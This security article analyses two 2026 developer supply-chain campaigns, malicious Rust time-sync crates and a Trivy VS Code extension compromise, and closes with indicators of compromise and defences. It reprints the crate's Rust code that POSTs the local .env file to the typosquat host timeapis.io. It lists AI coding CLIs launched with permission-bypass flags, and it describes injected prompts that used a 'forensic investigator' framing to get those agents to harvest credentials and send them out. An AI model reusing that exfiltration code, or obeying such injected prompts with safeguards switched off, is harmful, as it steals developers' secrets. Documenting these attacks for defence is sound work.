In late February 2026, two coordinated attack campaigns hit the developer ecosystem at the same time. Five malicious Rust packages quietly stole environment secrets from developer machines and CI pipelines. Simultaneously, an AI-powered GitHub bot scanned open-source repositories for misconfigured workflows and used a stolen token to push poisoned VS Code extension releases that weaponized developers' own AI coding tools against them.
Both campaigns were discovered and documented primarily by Socket's Threat Research Team and StepSecurity, with follow-up disclosure from Aqua Security. The incidents share a common target — the developer build environment — and a common prize: secrets, tokens, and credentials that live in the spaces between source code and production. Neither campaign required sophisticated zero-day exploitation. Both demonstrate that the weakest link in the software supply chain is often trust: trust placed in a new package, trust extended to a pull request, and trust baked into automation that runs without human review.
The Five Malicious Rust Crates
Socket's Threat Research Team uncovered five malicious crates published to crates.io, the official Rust package registry, between late February and early March 2026. The five packages were:
chrono_anchordnp3timestime_calibratortime_calibratorstime-sync
All five presented themselves as time-synchronization utilities — specifically, tools that could calibrate local system time without relying on the Network Time Protocol (NTP). That framing was deliberate. In restricted network environments and automated CI pipelines where outbound NTP traffic is blocked or undesirable, a lightweight local time-calibration package is a plausible dependency. The pitch lowered reviewer skepticism and made the packages look like they solved a real operational problem.
In reality, their core function was credential and secret theft. Security researcher Kirill Boychenko of Socket described the behavior plainly in his published analysis:
Kirill Boychenko of Socket's Threat Research Team characterized the packages plainly: while presenting as time utilities, their real purpose was to harvest credentials and secrets from developer environments — particularly .env files — and send that data to attacker-controlled infrastructure. Socket's published analysis described their function as "credential and secret theft" in direct terms. (Kirill Boychenko, Socket Threat Research Team, socket.dev, March 10, 2026.)
Socket assessed with high confidence that all five packages belonged to the same threat actor, based on shared exfiltration infrastructure, repeated code patterns, and identical logic. All five packages sent stolen data to a single lookalike domain: timeapis[.]io — a typosquat of the legitimate time API service timeapi.io. The extra letter "s" is the only visual difference.
The threat actor also used name selection to maximize accidental installs. dnp3times typosquats the legitimate dnp3time crate. chrono_anchor borrows the recognition of the widely-used chrono ecosystem and appends anchor to look like a companion package. time_calibrator, time_calibrators, and time-sync imitate harmless-sounding utility names that are easy to overlook during a dependency review.
RustSec, the security advisory database for the Rust ecosystem, documented that time_calibrators was removed roughly three hours after publication with no evidence of actual downloads. dnp3times was pulled within about six hours. time-sync was removed in approximately fifty minutes. chrono_anchor was still live on crates.io when Socket first flagged it, and the crates.io security team removed it and suspended the publisher account after Socket filed an abuse report. Adam Harvey from the crates.io team confirmed the removal and noted:
Adam Harvey of the crates.io team confirmed the removal in Socket's published report, expressing appreciation for Socket's ongoing malware reporting and noting that the crates.io security team looks forward to continued collaboration with Socket's Threat Research Team on keeping the ecosystem secure. (socket.dev, March 10, 2026)
The threat actor operated under several aliases. The chrono_anchor manifest hardcoded the author email gehakax777@kaoing[.]com and linked to a GitHub account at github[.]com/suntea279491, which returned a 404 at the time of writing. The package was published on crates.io under the account dictorudin, which linked to github[.]com/dictorudin, also showing no public repositories. A second email, jack@kaoing[.]com, appeared in another crate from the same cluster, suggesting the actor rotated identities while continuing to rely on the same disposable email domain.
How chrono_anchor Hid Its Exfiltration Logic
The four simpler crates performed straightforward exfiltration of .env files with minimal obfuscation. chrono_anchor went further. Its exfiltration logic lived inside a file named guard.rs, invoked from routine-looking parameter validation helpers and an "optional sync" function — code paths that a developer reviewing dependencies would not expect to trigger any network activity.
The attack sequence worked in three steps. First, the crate generated cover traffic by constructing an HTTPS URL pointing to the legitimate timeapi.io and calling it with curl in silent mode with a three-second timeout. This made initial network activity look like a genuine time check. Second, it derived the exfiltration endpoint by appending a single character to the same hostname constant — changing timeapi to timeapis — and downgrading the connection to plain HTTP. Third, it spawned a background thread, waited one second to reduce timing correlation, and uploaded the local .env file to that endpoint via a multipart form POST:
const REF_HOST: &str = "timeapi";
const REF_PATH: &str = "/api/Time/current/zone?timeZone=UTC";
fn fetch_ref_background() {
std::thread::spawn(|| {
// Cover traffic — appears as a legitimate time check
let url = format!("https://{}.io{}", REF_HOST, REF_PATH);
let _ = std::process::Command::new("curl")
.args(["-s", "-m", "3", url.as_str()])
.output();
});
}
fn submit_snapshot() {
std::thread::spawn(|| {
std::thread::sleep(std::time::Duration::from_secs(1));
// Exfiltration endpoint: http://timeapis[.]io/...
let ep = format!("http://{}s.io{}", REF_HOST, REF_PATH);
let form_arg = format!("file=@{}", crate::paths::ENV_FILE_PATH);
let _ = std::process::Command::new("curl")
.args(["-s", "-X", "POST", ep.as_str(), "-F", form_arg.as_str()])
.output();
});
}
.env files are routinely used to store API keys, cloud provider credentials, GitHub tokens, database passwords, and registry secrets outside of version control. In a CI pipeline, a single .env exfiltration can hand an attacker everything needed to pivot into cloud environments, impersonate the build system, or poison downstream package releases. The file does not need to be committed to a repo to be dangerous — it only needs to exist on disk when the malicious code path executes.
Notably, the malicious code in chrono_anchor did not establish persistence through a service or scheduled task. Instead, it relied on repeated execution: every time a developer or CI workflow hit the affected code path, it attempted to exfiltrate .env secrets again. In automated build environments, that means each pipeline run was a new exfiltration opportunity.
hackerbot-claw and the GitHub Actions Campaign
Running concurrently with the Rust crate campaign, an AI-powered GitHub account named hackerbot-claw conducted an automated attack against CI/CD pipelines across major open-source repositories. StepSecurity documented the campaign in detail. The GitHub account described itself as an "autonomous security research agent" — framing the bot as benign while it systematically targeted developer infrastructure.
Between February 21 and February 28, 2026, hackerbot-claw targeted at least seven repositories belonging to organizations including Microsoft, Datadog, and Aqua Security. The attack methodology followed a consistent playbook:
- Scan public repositories for misconfigured GitHub Actions workflows — specifically those using the
pull_request_targettrigger. - Fork the target repository.
- Open a pull request with a trivial, innocuous-looking change — a typo fix or minor documentation edit — while concealing the malicious payload in the branch name, a file name, or an embedded CI script.
- Allow the CI pipeline to trigger automatically when the pull request was created, executing the malicious code on the build server.
- Harvest secrets, tokens, and access credentials from the build environment.
The pull_request_target workflow trigger is particularly dangerous when misconfigured. Unlike the standard pull_request trigger, it runs in the context of the base repository rather than the fork — meaning it can access repository secrets. When a maintainer has not restricted which pull requests can trigger this workflow, an external contributor (or an automated bot) can cause privileged code execution simply by opening a pull request.
Whether hackerbot-claw was fully autonomous is a question worth holding carefully. Pillar Security's analysis of the campaign, which they named Chaos Agent, concluded that the most likely explanation is a human operator using an LLM as an execution layer — someone who selected targets, defined the technique classes, and made real-time strategic decisions, while the AI generated payloads, drafted pull requests, and handled rapid iteration. The "autonomous agent" framing in the bot's own profile description was partly functional and partly cover story. The operational infrastructure supported this reading: the account maintained a public Gist-based scoreboard that logged results after each attempt, and structured session identifiers appeared consistently across every pull request. That scoreboard is not something a fully unsupervised system builds and maintains; it is the artifact of someone tracking progress. Pillar's researchers noted that hackerbot-claw escalated its approach against awesome-go within eleven minutes of an initial failed attempt, and changed its OPSEC behavior after the Trivy compromise — both signals of adaptive human decision-making in the loop.
Are These Campaigns Connected?
The timing invites the question: are the Rust crate campaign and the hackerbot-claw operation the work of the same threat actor?
The short answer from the available evidence is: probably not, but the honest answer is that no one has publicly established either a link or a confirmed separation. Socket's analysis of the five Rust crates attributed them, with high confidence, to a single actor based on shared infrastructure, repeated code patterns, and the same exfiltration domain. StepSecurity's analysis of hackerbot-claw focused entirely on the GitHub Actions exploitation and did not draw any connection to the crate campaign. Neither report speculates about a common origin. The threat actors involved, if they are distinct, simply chose the same target — the developer build environment and its credential store — at the same time.
That convergence is worth pausing on. Two independent actors targeting .env files through different vectors, in the same week, against overlapping infrastructure (Aqua Security, an open-source security project) is not a coincidence that demands a single explanation. It reflects a shared understanding in the attacker community about where developer credentials live and how to reach them. The techniques differ — package typosquatting versus GitHub Actions exploitation versus stolen publisher tokens — but the prize is identical. Treating these as isolated incidents obscures a more accurate framing: developer build environments are currently a high-priority target class, and multiple actors are pursuing them through whatever vectors are available.
The absence of attribution for either campaign also matters beyond the headline. No government body has named a responsible actor. No ransomware group has claimed credit. The timeapis[.]io registration and the identity aliases associated with the Rust crates point to operational infrastructure that was disposable by design — registration details that were either false or quickly abandoned after takedown. hackerbot-claw's GitHub account similarly went dark. This anonymity is itself a data point: campaigns like these carry low risk of consequence for the actors behind them, which makes them attractive regardless of the eventual ROI on any particular stolen credential.
The Trivy Extension Compromise (CVE-2026-28353)
The highest-profile target of hackerbot-claw was aquasecurity/trivy, the popular open-source security scanner used by security teams worldwide to detect vulnerabilities, misconfigurations, and exposed secrets in container images and filesystems. The attacker exploited a pull_request_target workflow vulnerability in the Trivy repository to steal a Personal Access Token (PAT). StepSecurity described what followed:
StepSecurity's published analysis documented how the attacker used the misconfigured workflow to extract a Personal Access Token, then used that stolen credential to take over the Aqua Security repository entirely. (stepsecurity.io, 2026)
With the stolen PAT, the attacker authenticated as a legitimate Aqua Security publisher and pushed two malicious versions of the Trivy VS Code extension to the Open VSX registry — the primary extension marketplace for VS Code-compatible editors outside of Microsoft's own marketplace. The affected versions were 1.8.12 (published February 27, 2026, at 12:04 UTC) and 1.8.13 (published February 28, 2026, at 16:28 UTC).
The OpenVSX publisher account used to push the extensions belonged to a former Aqua Security employee. When Socket contacted him directly, he revoked the publishing token and removed the affected versions from the registry the same day. Both malicious versions were removed by February 28, 2026 at 22:46 UTC.
The incident is formally tracked as CVE-2026-28353.
The Damage Beyond Credential Theft
The exfiltration of secrets was not the only outcome at Aqua Security. After gaining authenticated access through the stolen PAT, hackerbot-claw deleted approximately 97 software releases from the Trivy repository and wiped roughly 32,000 GitHub stars from the project. Stars function as a trust signal across the open-source ecosystem: they inform adoption decisions, surface projects in search rankings, and indicate community confidence. Erasing them does not just damage visibility; it erodes the social proof that drives new developers to evaluate a tool in the first place.
That combination — secrets stolen, releases deleted, reputation damaged — illustrates a threat model that extends past the traditional credential-theft framing. The attacker did not need to distribute poisoned builds downstream to cause harm. Disrupting the project's distribution history and degrading its public standing were themselves meaningful outcomes. For maintainers and security teams assessing the risk of a GitHub Actions misconfiguration, the question is not only what secrets live in the build environment, but what an authenticated session on the repository can do to the project's integrity and public record.
What Happens After the Exfiltration
The article so far has described what was taken. The question it has not yet asked is what the attacker could do with it.
Neither Socket nor StepSecurity has publicly documented confirmed downstream use of the stolen credentials — no attributed intrusion, no ransomware deployment, no poisoned downstream release that has been traced back to this campaign. That absence is notable for a few reasons, none of them reassuring.
First, credential theft and credential use are often separated by weeks or months. Stolen tokens are frequently sold through underground markets rather than used directly. A GITHUB_TOKEN with write permissions to a widely-used open-source project is a valuable commodity independent of whether the actor who stole it has an immediate use case. The exposure window and the downstream impact window are different intervals, and the second one does not always become visible in the same news cycle as the first.
Second, the attacker's collection problem may have limited what was actually recovered. Version 1.8.12 of the compromised Trivy extension was designed to scatter exfiltrated data across every available outbound channel simultaneously, with no clean collection point. Version 1.8.13 improved the architecture by routing findings to a repository under the victim's own GitHub account — but that repository defaults to private, and there is no confirmed evidence the attacker successfully accessed it. What this means in practice is that the attacker may have designed a more sophisticated exfiltration mechanism than they were able to operationalize. The gap between what a campaign attempts and what it successfully collects is rarely public.
Third, for the Rust crate campaign, every .env file successfully POSTed to timeapis[.]io was delivered to infrastructure the attacker controlled. Those requests completed before any advisory existed. Developers who hit the affected code path — including every automated CI job that compiled a project with one of the five crates in its dependency tree — had no visibility into the outbound request. The credentials exfiltrated through that channel could have been used, sold, or abandoned; there is no public record of which occurred.
Organizations that treat a takedown as a resolution should read the timeline differently: the crates are gone, but the data they collected is not. Credential rotation for any machine or CI environment that ran these packages during their live window is not optional hygiene — it is the only way to close the exposure.
What the Injected AI Prompts Were Designed to Do
The most technically novel element of this attack was not the token theft. It was what the attacker did with the stolen access. Rather than injecting traditional malware code with hardcoded network callbacks, the compromised extension contained natural-language prompts that instructed locally installed AI coding assistants to perform the reconnaissance and exfiltration on the attacker's behalf.
Both versions injected code into the extension's workspace activation function — the function that runs every time a developer opens a project in their editor. The injected code attempted to execute five AI coding tools in their most permissive, unattended modes:
claude -p --dangerously-skip-permissions --add-dir /
codex exec --ask-for-approval never --sandbox danger-full-access
gemini prompt --yolo --no-stream
copilot --autopilot --yolo -p
kiro-cli chat -a --no-interactive
All five processes were spawned detached with stdio: "ignore", meaning the user would see nothing while the extension continued to function normally. Whichever AI tool happened to be installed would silently execute. Errors were swallowed. The extension's legitimate Trivy scanning behavior continued in parallel, providing cover.
Version 1.8.12 — Mass Reconnaissance
The first injected prompt was approximately 2,000 words long. It assigned the AI agent the role of a "forensic analysis investigator" and instructed it to search the system for evidence of security compromise, financial crimes, credential theft, insider trading indicators, and regulatory violations. The forensic framing was deliberate. As Socket's researchers noted, an AI model presented with a direct instruction to steal credentials would likely refuse. Framed as a legitimate internal investigation with chain-of-custody requirements, the same actions fell within what the model considered authorized and compliant behavior.
The prompt instructed the agent to discover every available outbound communication channel on the system — email clients, messaging platforms, file transfer services, ticketing systems, external gateways — and push the collected findings through all of them simultaneously. The explicit goal was to "maximize the probability that findings reach appropriate recipients and cannot be contained or suppressed." In practice, that meant credentials, tokens, and internal data scattered across an uncontrolled set of destinations with no reliable collection point for the attacker. Socket assessed this version as more chaotic than targeted.
Version 1.8.13 — Targeted Exfiltration via the Victim's Own GitHub Account
The second version replaced the sprawling reconnaissance prompt with something far more focused. The injected instruction told the AI agent to assess the host system for installed tools, authentication sessions, and tokens, write the findings to a file called REPORT.MD, and then — if the GitHub CLI was present and authenticated — create a new repository under the victim's own GitHub account named posture-report-trivy and commit the report to it.
This was a meaningful refinement. Version 1.8.12 scattered data everywhere but gave the attacker no reliable way to collect the output. Version 1.8.13 used the victim's own authenticated GitHub session as a clean exfiltration channel. However, the gh CLI defaults to creating private repositories, which would make the exfiltrated data visible only to the victim's own account — not necessarily to the attacker. Socket confirmed that no public repositories named posture-report-trivy existed at the time of their investigation, suggesting the practical impact of this version was likely limited. As Socket observed:
Socket's researchers characterized the two versions as iterations on a common problem: the first prompt broadcast stolen data through too many simultaneous channels, giving the attacker no reliable way to collect the output. The second version addressed that by routing exfiltrated data through the victim's own authenticated GitHub account — a cleaner channel, but one whose usefulness depended on repository visibility settings the attacker could not control. Socket's conclusion was that version 1.8.13 fixed the collection problem in theory while potentially pushing results to a private repository the attacker could never access. (Peter van der Zee and Philipp Burckhardt, Socket, socket.dev, March 2, 2026)
For a system to be meaningfully affected by either version, the following conditions all needed to be true: the user had installed version 1.8.12 or 1.8.13 from Open VSX; at least one of the five targeted AI coding CLI tools was installed locally; that CLI accepted the permissive execution flags provided; the agent could access sensitive data on disk; and for version 1.8.13, the GitHub CLI was installed and authenticated. If none of the five AI tools were present, the injected code would execute and fail silently.
What makes this technique significant is not the specific outcome of this campaign but the method itself. The attacker offloaded the malicious behavior entirely to AI agents that already had legitimate access to the developer's filesystem, credentials, and authenticated tooling. The malicious intent was expressed in natural language rather than code, which bypasses most conventional software composition analysis tools that scan for suspicious function calls, hardcoded endpoints, or known malware signatures. Socket's researchers described this as an emerging form of AI-assisted supply chain abuse: social engineering adapted for the age of AI agents.
The One Defense That Worked
Of the repositories targeted across the 37-hour campaign, one blocked the attack at the point of execution. Ambient Code, a smaller open-source project, had configured its CI workflow to route pull requests through Claude Code for automated review. When hackerbot-claw submitted its malicious pull request, Claude Code identified the injected instructions as adversarial and blocked execution — in approximately 82 seconds. Pillar Security described it as the only control in the entire campaign that stopped an attack before it ran.
That outcome does not make a general case for AI code review as a security control; a single instance against a single attack pattern is a data point, not a benchmark. What it does illustrate is the point the article's final takeaway approaches but does not fully reach: detection has to move upstream of execution. The standard controls — secret scanning, dependency audits, SAST — operate on artifacts that already exist. The Trivy extension's 2,000-word forensic prompt does not produce an artifact that those tools examine. The only layer that could catch it was one positioned to evaluate the prompt's intent before any code ran.
The broader implication for organizations running AI-assisted CI workflows is that the same agents being evaluated for their ability to catch bugs and security issues are also the agents an attacker will attempt to weaponize or circumvent. That dual role — potential defender and potential attack surface — makes the configuration of those agents, specifically which permissions they hold and whether they require human approval before acting, a security decision, not just a developer-experience preference.
There is a sharper version of this question that the Ambient Code outcome raises but does not answer: if you configure an AI agent to review pull requests on your behalf, and the attacker submits a pull request designed to manipulate that reviewer, are you more or less secure than if no AI reviewer existed? The Ambient Code case landed on the favorable side of that question. But the favorable outcome depended on the AI correctly identifying adversarial intent in a prompt crafted specifically to look legitimate. That is a probabilistic defense, not a deterministic one. An attacker who knew that Claude Code was the reviewer could iterate on their prompt until it passed — exactly the kind of adaptive behavior Pillar Security observed hackerbot-claw exhibiting against other targets. The 82-second block is a real outcome; treating it as a reliable control model requires evidence from a much larger sample of adversarial prompts than a single campaign provides.
The structural point stands regardless: detection needs to move upstream of execution, and AI reviewers positioned before the code runs are the only layer that can evaluate the intent of a natural-language payload. What needs to accompany that capability is an honest accounting of its failure modes — not because the approach is wrong, but because any defense built on probabilistic reasoning about adversarial intent needs redundant controls underneath it, not above it.
Indicators of Compromise
| Type | Indicator |
|---|---|
| Malicious Rust crate | chrono_anchor |
| Malicious Rust crate | dnp3times |
| Malicious Rust crate | time_calibrator |
| Malicious Rust crate | time_calibrators |
| Malicious Rust crate | time-sync |
| Exfiltration domain | timeapis[.]io |
| Exfiltration URL | http://timeapis[.]io/api/Time/current/zone?timeZone=UTC |
| Threat actor alias (crates.io) | dictorudin |
| Threat actor alias | gehakax777 |
| Threat actor alias (GitHub) | suntea279491 |
| Threat actor email | gehakax777@kaoing[.]com |
| Threat actor email | jack@kaoing[.]com |
| Compromised VS Code extension | aquasecurityofficial.trivy-vulnerability-scanner 1.8.12 (Open VSX) |
| Compromised VS Code extension | aquasecurityofficial.trivy-vulnerability-scanner 1.8.13 (Open VSX) |
| CVE | CVE-2026-28353 |
| Suspicious repo artifact | GitHub repository named posture-report-trivy under victim account |
| Suspicious file artifact | REPORT.MD created in a project or working directory |
MITRE ATT&CK mappings for the Rust crate campaign include: T1195.002 (Supply Chain Compromise), T1204 (User Execution), T1036 (Masquerading), T1552.001 (Credentials In Files), T1005 (Data from Local System), T1583.001 (Acquire Infrastructure: Domains), T1071.001 (Application Layer Protocol: Web Protocols), and T1041 (Exfiltration Over C2 Channel).
Defenses That Address the Root Causes
Generic advice on supply chain attacks tends to converge on the same short list: pin your dependencies, run a scanner, review new packages. Those controls are not wrong, but they operate at the wrong layer for the techniques demonstrated here. The following defenses address the specific failure modes this campaign exploited.
Stop Treating .env Files as Out-of-Scope for Secrets Management
The persistent centrality of .env files as the primary exfiltration target across supply chain campaigns is a structural problem, not a configuration gap. The .env convention aggregates every secret a developer needs in one plaintext file that any process on the system can read. The fix is not adding .env to .gitignore — that is table stakes. The deeper solution is eliminating the file as a secrets source for anything other than local developer testing.
In CI/CD environments, secrets should be injected at runtime from a dedicated secrets management service — HashiCorp Vault, AWS Secrets Manager, Azure Key Vault, Google Secret Manager — scoped to the minimum set of secrets the specific job requires. A build job that compiles code does not need database credentials. A job that runs unit tests does not need production API keys. Each job should receive exactly the secrets it will use and nothing more. When a malicious dependency executes inside that job, it inherits only that job's scoped secrets, not the full set of credentials your team maintains. This is least-privilege applied to secrets, not just to permissions.
For developer machines, short-lived credential injection via tools like direnv combined with secrets backends that rotate credentials frequently limits the damage window of any individual machine compromise. If a stolen .env snapshot contains credentials that expire in four hours, the operational impact is bounded regardless of whether the attacker successfully received the file.
Treat Dependency Installation as Code Execution — Because It Is
The four simpler Rust crates performed their exfiltration at build time. chrono_anchor did the same. Every package that includes a build script, a procedural macro, or initialization logic that runs during compilation or import has the ability to execute arbitrary code on your machine or CI worker the moment you install it. This is not a Rust-specific issue — npm install scripts, Python package setup hooks, and Go init functions carry identical risk.
The practical response is to extend the security review boundary to include the point of installation, not just the point of code execution. Tools built specifically for this — Socket's behavioral analysis for npm and crates, Phylum for Python and npm, cargo-vet for Rust — evaluate what a package actually does when installed rather than checking its name against a known-malware list. Name-hash checks catch packages that have already been reported. Behavioral pre-install analysis catches packages that are currently live and have not yet been flagged. That distinction — retrospective versus prospective detection — is the gap this campaign exploited. chrono_anchor was still available for installation when Socket identified it. Developers who had installed it in the previous days had no advisory to consult.
Integrating Socket's socket CLI or Phylum into CI pre-install steps — running before cargo build or npm install, not after — means suspicious packages are blocked before they execute. The policy can be configured to block on specific risk signals (network access in build scripts, file system access outside the package directory, spawning child processes) rather than requiring a full malware designation before acting.
Lock Down pull_request_target With Explicit Conditional Logic
The pull_request_target trigger is not inherently dangerous; it exists because some legitimate CI patterns — labeling pull requests, posting comments, updating status checks — require access to repository secrets that fork-based workflows cannot have. The problem is that the same trigger, configured carelessly, runs arbitrary code from a fork with full access to those same secrets.
The mitigation is not disabling the trigger but restricting it with explicit conditions. Workflows using pull_request_target should separate the privileged and unprivileged stages: the stage that checks out and runs untrusted code from a fork should use pull_request, not pull_request_target, and should have no access to repository secrets. The stage that posts results, applies labels, or updates external systems should use pull_request_target but must never check out code from the fork. GitHub's own documentation covers this separation, but it is not enforced by default, and many workflows in production do not implement it.
Organizations running public repositories should audit every workflow using pull_request_target to verify that no checkout step on fork code precedes any use of repository secrets. StepSecurity's Harden-Runner can detect and alert on this pattern in existing workflows, and their free GitHub Actions security audit tool surfaces these misconfigurations across a repository without requiring workflow changes first.
Revoke Publishing Credentials for Departed Employees Immediately — Not Eventually
The Trivy extension compromise was made possible by an unexpired publishing token belonging to a former Aqua Security employee. This is the failure that turned a GitHub Actions exploitation into a supply chain attack affecting end users. The token gave the attacker authenticated access to a trusted publisher namespace on Open VSX — something no amount of pre-publication scanning addresses if the publisher identity appears legitimate.
The control is not technical; it is procedural. Offboarding checklists for developers who hold publishing access to package registries, extension marketplaces, or CI/CD deployment pipelines must include explicit token revocation steps with verification. The verification matters: it is not enough to remove access in one system if the token was generated in another. For crates.io, Open VSX, npm, PyPI, and similar registries, verify that tokens linked to the departing employee's account are fully revoked and that the namespace's authorized publisher list reflects current staff. Scheduled quarterly audits of publishing credentials across all registries your team maintains — not just the ones that had a recent incident — surface stale access before an attacker finds it.
Configure AI Coding Agents as Security Decisions, Not Convenience Preferences
The injected prompts in the Trivy extension compromise targeted Claude Code, Codex, Gemini CLI, Copilot, and Kiro with their most permissive execution flags. Those flags exist for legitimate use cases, but they represent a security posture: an AI agent running with --dangerously-skip-permissions and full filesystem access is, by design, an agent that will not ask before acting.
Treating the configuration of AI coding agents as a security decision means establishing organizational defaults rather than leaving each developer's installation to personal preference. Concretely: require human approval for file writes outside the current project directory; disable or explicitly gate the flags that allow unattended execution with full filesystem scope; and log all AI agent invocations — the prompt sent, the tool called, and the output produced — to a centralized store that security teams can audit. The logging is what enables detection of the pattern this attack used: a process invoking an AI agent at workspace activation with a prompt the developer did not write.
For teams running AI-assisted CI pipelines, the Ambient Code case in this campaign is instructive. Claude Code's review blocked the malicious pull request in roughly 82 seconds — not because it was scanning for known malicious code, but because it evaluated the pull request's intent and identified it as adversarial. That is a different detection layer than static analysis, and it operates upstream of execution. Whether or not your team uses AI for code review, the general principle applies: detection needs to move to the point where intent can be evaluated, not just after artifacts have been produced.
Build a Dependency Ingestion Policy, Not Just a Dependency Audit Schedule
Scheduled dependency audits are retrospective. An ingestion policy is prospective: it defines the conditions under which a new dependency can enter your codebase at all, before the pull request merges. The conditions can be lightweight — minimum download count, minimum age, at least one published version before the one being installed, no build-time network access — and enforced automatically through CI checks rather than manual review.
cargo deny supports policy enforcement for Rust, including license checks, banned crate lists, and duplicate dependency detection. Combined with cargo audit for known RustSec advisories and a behavioral pre-install tool for new additions, this gives you three independent layers that each catch different things: cargo audit catches known-bad; cargo deny enforces organizational policy; behavioral analysis catches unknown-bad that is currently live. Running all three in CI, blocking on failures rather than reporting them, means a malicious crate does not reach a developer machine — it fails the pipeline first.
Restrict Outbound Network Access in Build Environments at the Infrastructure Level
The exfiltration in both campaigns — the Rust crate POST to timeapis[.]io and the AI agent data push through GitHub or scattered communication channels — required outbound network access from the build or development environment. Restricting that access at the infrastructure level, not through application-layer controls, removes the entire class of exfiltration technique rather than addressing individual malware families.
In practice this means: egress filtering on CI runners that allows only explicitly whitelisted domains; network policies in Kubernetes-based build environments that deny all outbound traffic except to defined registries and artifact stores; and for developer machines in high-sensitivity environments, DNS-layer filtering that flags or blocks connections to newly registered domains. timeapis[.]io was a typosquat of a legitimate service. A DNS resolver that blocks or alerts on domains registered within the past 30 days would have interrupted the exfiltration regardless of whether the malicious crate was detected before installation.
StepSecurity's Harden-Runner implements egress filtering specifically for GitHub Actions, allowing workflow-level network policies without requiring infrastructure-level changes to GitHub's runner environment. For self-hosted runners, network-level egress controls are achievable through standard firewall rules or cloud security group policies.
What to Do If You Were Exposed
If you downloaded any of the five malicious Rust crates while they were live, treat your environment as potentially compromised regardless of whether you can confirm the exfiltration code path was executed. The recommendations from Socket apply directly:
- Assume possible exfiltration and rotate all API keys, tokens, cloud credentials, GitHub tokens, SSH keys, and any secrets stored in
.envfiles that were accessible on the affected machine. - Audit all CI/CD jobs that ran with publish or deploy credentials during the exposure window.
- Restrict outbound network access in build and test phases where feasible.
- Run
cargo auditandcargo denyagainst your dependency trees to check for RustSec advisories.
If you installed Trivy VS Code extension version 1.8.12 or 1.8.13 from Open VSX, the additional steps are:
- Uninstall the affected extension immediately and verify your current installed version.
- Check your GitHub account for unexpected repositories, particularly one named
posture-report-trivy. - Review your shell history for invocations of
claude,codex,gemini,copilot, orkiro-cliwith the permissive flags listed above. - Rotate all credentials that were accessible on the machine during the February 27–28, 2026 exposure window.
- If AI agent logging is enabled in your local tools, review those logs for automated prompts you did not initiate.
The Registry Transparency Question
One week before the five malicious Rust crates were published, crates.io changed how it communicates malware removals to the community. In a February 13, 2026 post, the crates.io team announced it would stop publishing a blog post each time a malicious crate is detected and removed. The new policy routes those notifications exclusively through RustSec advisories — a database that developers must actively monitor, rather than one that surfaces in general developer news feeds. The rationale was reasonable: in the vast majority of prior cases, the removed crates had shown no evidence of real-world downloads, and the blog posts were generating noise rather than signal. Crates that see actual usage or active exploitation will still receive both a blog post and a RustSec advisory.
The timing is notable context for this campaign. chrono_anchor — the most sophisticated of the five crates, the one still live when Socket flagged it — was the kind of package the new policy was designed to treat differently: it had a live publisher account, obfuscated logic, and was still available for installation. It received the full response. The four simpler crates, removed quickly with no confirmed downloads, would under the new policy generate a RustSec advisory entry and nothing more.
Whether that threshold is correctly calibrated is a legitimate question. The crates.io team's judgment is that low-download, quickly-removed packages do not warrant ecosystem-wide noise. The counterargument is that the absence of visible download counts is not the same as the absence of impact — a crate installed into a single high-value CI pipeline leaves no public download trace proportional to its damage. Developers who rely on blog posts and security newsletters to stay current on package ecosystem threats will see less of this pattern under the new policy. Those who subscribe to the RustSec RSS feed will see it all.
There is a related question the new policy does not address and that the campaign itself makes visible: what is the correct way to count a download when the installation happens inside an automated CI pipeline that runs hundreds of times a day? A developer who adds a malicious crate to a monorepo build may register one install on the developer's machine. The CI system may then execute that same crate against hundreds of build jobs, none of which generate a distinct download event on the registry side. The download count on crates.io reflects registry pulls, not executions. A crate pulled once to a build cache and run a thousand times against production pipelines looks identical in the registry record to a crate pulled once and never used.
This means that download count — the signal both the old notification policy and the new one use to distinguish high-impact removals from low-impact ones — is a poor proxy for the actual question, which is whether the crate executed in a context where it could cause damage. No registry currently tracks execution context. The crates.io team's threshold calibration is reasonable given the data available; it is also working with the wrong metric. What a policy based on real-world impact would require is visibility that no public package registry has yet built.
Key Takeaways
- Low complexity does not mean low impact. None of these techniques required zero-day exploits or nation-state tooling. Typosquatted package names, a misconfigured GitHub Actions workflow trigger, and a stolen token from a former employee were sufficient to reach the build pipelines of major open-source projects.
- The .env file is the prize. Attackers know that developers store production secrets in environment files because it is convenient and keeps credentials out of source control. Any malicious dependency that executes during a build gets a chance to harvest those secrets. Treat every new dependency as having read access to your environment variables until proven otherwise.
- pull_request_target is a dangerous default. GitHub's
pull_request_targettrigger runs workflow code in the context of the base repository, with access to secrets, when triggered by a fork's pull request. Organizations with public repositories should audit all workflows using this trigger and restrict which conditions allow it to run with elevated permissions. - AI coding agents expand the attack surface of every tool that can invoke them. The Trivy extension compromise introduced a new attack pattern: using a malicious VS Code extension to invoke locally installed AI agents with full-filesystem permissions and no human approval required. As AI coding assistants become standard developer tooling, any compromised extension, plugin, or dependency that can call them inherits their reach into the developer's environment.
- The Open VSX enforcement window opened the month after this attack. The Eclipse Foundation announced in January 2026 that February would be an observation-only period for new pre-publication security scanning, with enforcement — including automatic quarantine of extensions that trigger alerts — beginning in March 2026. The malicious Trivy extensions were published on February 27 and 28. Whether that timing was coincidental or deliberate is unknown. What is documented is that the attack used a publisher token belonging to a former employee to authenticate as a legitimate namespace, not a new or unknown publisher. Pre-publication scanning for injected secrets would not automatically have caught a token-authenticated upload from an established namespace. Enforcement and revocation of stale publishing credentials are separate problems, and the Open VSX incident illustrates that solving one does not solve the other.
- Natural-language prompts are a new class of malicious payload. Traditional software composition analysis tools look for suspicious function calls, hardcoded IPs, and known malware signatures. A 2,000-word natural-language prompt instructing an AI agent to act as a forensic investigator and exfiltrate data through every available channel does not match those signatures. This mirrors the logic behind social-engineering attacks like ClickFix — the payload is instructions, not executable code — and detection tooling needs to evolve accordingly.
Socket's summary of the Rust crate campaign is worth holding onto as a general principle: low-complexity supply chain malware can still deliver high-impact outcomes when it executes inside developer workspaces and CI jobs. The controls that matter are the ones that stop malicious dependencies before they run. Scanning packages for behavioral anomalies before installation — not just checking name hashes and download counts — is the layer that catches these campaigns while they are still live.
